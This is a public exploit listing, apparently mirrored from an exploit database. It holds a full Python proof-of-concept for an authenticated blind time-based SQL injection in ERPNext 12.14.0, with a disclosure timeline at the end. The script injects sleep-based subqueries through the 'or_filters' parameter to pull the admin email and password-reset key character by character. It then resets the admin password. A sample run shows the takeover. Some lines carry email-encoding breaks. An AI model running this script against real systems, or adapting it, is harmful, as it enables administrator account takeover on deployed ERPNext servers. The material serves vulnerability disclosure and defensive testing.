Share
## https://sploitus.com/exploit?id=PACKETSTORM:161063
# Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)  
# Date: 21-01-21  
# Exploit Author: Hodorsec  
# Vendor Homepage: http://erpnext.org  
# Software Link: https://erpnext.org/download  
# Version: 12.14.0  
# Tested on: Ubuntu 18.04  
  
#!/usr/bin/python3  
  
# AUTHENTICATED SQL INJECTION VULNERABILITY  
# In short:  
# Found an authenticated SQL injection when authenticated as a low-privileged user as the parameters "or_filter" and "filters" are not being sanitized sufficiently. Although several sanitation and blacklist attempts are used in the code for other parameters, these parameters aren't checked. This allows, for example, a retrieval of the admin reset token and reset the admin account using a new password as being shown in the PoC.  
#  
# Longer story:  
# Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.  
# The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used.  
# Initially, the requests where performed using the HTTP POST method which checks for a CSRF token. However, converting the request to an HTTP GET method, the CSRF token isn't required nor checked.  
# Test environment:  
# Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.  
# Cause:  
# In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.  
  
# STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY  
# 1. Create account  
# 1.a. Use update-password link for created user received via mail  
# STEPS INCLUDED IN SCRIPT  
# 1. Login using existing low-privileged account  
# 2. Use SQL Injection vulnerability in "frappe/frappe/nodel/db_query/get_list" function by not sanitizing parameters "filters" and "or_filters" sufficiently  
# 3. Retrieve reset key for admin user  
# 4. Reset admin account using given password  
  
# DEMONSTRATION  
# $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py hodorhodor@nowhere.local passpass1234@ admin password123411111 http://192.168.252.8/ 2  
# [*] Got an authenticated session, continue to perform SQL injection...  
# [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...  
# admin@nowhere.local  
# [*] Retrieved value 'admin@nowhere.local' for username 'admin' column 'name' in row 1  
# [*] Sent reset request for 'admin@nowhere.local  
# [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...  
# xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX  
# [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1  
# [+] Retrieved email 'admin@nowhere.local' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'  
# [+} RESETTED ACCOUNT 'admin@nowhere.local' WITH NEW PASSWORD 'password123=411111!  
#   
# [+] Done!  
  
import requests  
import urllib3  
import os  
import sys  
import re  
  
# Optionally, use a proxy  
# proxy = "http://<user>:<pass>@<proxy>:<port>"  
proxy = ""  
os.environ['http_proxy'] = proxy  
os.environ['HTTP_PROXY'] = proxy  
os.environ['https_proxy'] = proxy  
os.environ['HTTPS_PROXY'] = proxy  
  
# Disable cert warnings  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
# Set timeout  
timeout = 30  
  
# Injection prefix and suffix  
inj_prefix = "[\"select(sleep("  
inj_suffix = "))))\"]"  
  
# Decimal begin and end  
dec_begin = 48  
dec_end = 57  
  
# ASCII char begin and end  
ascii_begin = 32  
ascii_end = 126  
  
# Handle CTRL-C  
def keyboard_interrupt():  
"""Handles keyboardinterrupt exceptions"""  
print("\n\n[*] User requested an interrupt, exiting...")  
exit(0)  
  
# Custom headers  
def http_headers():  
headers = {  
'User-Agent': "Mozilla",  
}  
return headers  
  
# Get an authenticated session  
  
def get_session(url,headers,email,password):  
data = {'cmd':'login',  
'usr':email,  
'pwd':password,  
'device':'desktop'}  
session = requests.session()  
r = session.post(url,headers=headers,data=data,timeout=timeout,=  
allow_redirects=True,verify=False)  
if "full_name" in r.text:  
return session  
else:  
print("[!] Unable to get an authenticated session, check credentials...")  
exit(-1)  
  
# Perform the SQLi call for injection  
def sqli(url,session,headers,inj_str,sleep):  
comment_inj_str = re.sub(" ","+",inj_str)  
inj_params = {'cmd':'frappe.model.db_query.get_list',  
'filters':'["idx=1"]',  
'or_filters':inj_str,  
'fields':'idx',  
'doctype':'Report',  
'order_by':'idx',  
'group_by':'idx'}  
  
# inj_params[param] = comment_inj_str  
inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_para=  
ms.items())  
=20  
# Do GET  
r = session.get(url,params=inj_params,headers=headers,timeout=t=  
imeout,verify=False)  
res = r.elapsed.total_seconds()  
if res >= sleep:  
return True  
elif res < sleep:  
return False  
else:  
print("[!] Something went wrong checking responses. Check responses manually. Exiting.")  
exit(-1)  
  
# Loop through positions and characters  
def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep):  
extracted = ""  
max_pos_len = 35  
# Loop through length of string  
# Not very efficient, should use a guessing algorithm  
for pos in range(1,max_pos_len):  
# Test if current pos does have any valid value. If not, break  
direction = ">"  
inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" =  
+ direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix  
if not sqli(url,session,headers,inj_str,sleep):  
break  
# Loop through ASCII printable characters  
direction = "="  
for guess in range(ascii_begin,ascii_end+1):  
extracted_char = chr(guess)  
inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix  
if sqli(url,session,headers,inj_str,sleep):  
extracted += chr(guess)  
print(extracted_char,end='',flush=True)  
break  
return extracted  
  
  
def forgot_password(url,headers,sqli_email):  
data = {'cmd':'frappe.core.doctype.user.user.reset_password',  
'user':sqli_email}  
r = requests.post(url,headers=headers,data=data,verify=False,al=  
low_redirects=False,timeout=timeout)  
if "Password reset instructions have been sent to your email" in r.text=  
:  
return r  
  
def reset_account(url,headers,sqli_email,sqli_reset_key,new_password):  
data = {'key':sqli_reset_key,  
'old_password':'',  
'new_password':new_password,  
'logout_all_sessions':'0',  
'cmd':'frappe.core.doctype.user.user.update_password'}  
r = requests.post(url,headers=headers,data=data,verify=False,al=  
low_redirects=False,timeout=timeout)  
if r.status_code == 200:  
return r  
  
# Main  
def main(argv):  
if len(sys.argv) == 7:  
email = sys.argv[1]  
password = sys.argv[2]  
username = sys.argv[3]  
new_password = sys.argv[4]  
url = sys.argv[5]  
sleep = int(sys.argv[6])  
else:  
print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>")  
print("[*] Example: " + sys.argv[0] + " hodorhodor@nowhere.local passpass1234@ admin password1234@ http://192.168.252.8/ 2\n")  
exit(0)  
  
# Random headers  
headers = http_headers()  
  
# Sleep divide by 2 due to timing caused by specific DBMS query  
sleep = sleep / 2  
  
# Optional prefix / suffix  
prefix = ""  
suffix = ""  
  
# Tables / columns / values  
table = 'tabUser'  
columns = ['name','reset_password_key']  
sqli_email = ""  
sqli_reset_key = ""  
  
# Rows  
rows = 1  
  
# Do stuff  
try:  
# Get an authenticated session  
session = get_session(url,headers,email,password)  
if session:  
print("[*] Got an authenticated session, continue to perform SQL injection...")  
=20  
# Getting values for found rows in specified columns  
for column in columns:  
print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")  
for row in range(0,rows):  
retrieved = get_data(url,session,headers,prefix,suffix,ro=  
w,column,table,username,sleep)  
print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))  
if column == 'name':  
sqli_email = retrieved  
# Generate a reset token in database  
if forgot_password(url,headers,sqli_email):  
print("[*] Sent reset request for '" + sqli_email + "'"=  
)  
else:  
print("[!] Something went wrong sending a reset request, check requests or listening mail server...")  
exit(-1)  
elif column == 'reset_password_key':  
sqli_reset_key = retrieved  
  
# Print retrieved values  
print("[+] Retrieved email '" + sqli_email + "' and reset key '" + =  
sqli_reset_key + "'")  
  
# Reset the desired account  
if reset_account(url,headers,sqli_email,sqli_reset_key,new_password=  
):  
print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")  
else:  
print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")  
exit(-1)  
=20  
# Done  
print("\n[+] Done!\n")  
except requests.exceptions.Timeout:  
print("[!] Timeout error\n")  
exit(-1)  
except requests.exceptions.TooManyRedirects:  
print("[!] Too many redirects\n")  
exit(-1)  
except requests.exceptions.ConnectionError:  
print("[!] Not able to connect to URL\n")  
exit(-1)  
except requests.exceptions.RequestException as e:  
print("[!] " + str(e))  
exit(-1)  
except requests.exceptions.HTTPError as e:  
print("[!] Failed with error code - " + str(e.code) + "\n")  
exit(-1)  
except KeyboardInterrupt:  
keyboard_interrupt()  
exit(-1)  
  
# If we were called as a program, go execute the main function.  
if __name__ == "__main__":  
main(sys.argv[1:])  
  
# Timeline:  
# 22-12-20: Sent initial description and PoC via https://erpnext.com/security  
# 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.  
# 21-01-21: No response received, public disclosure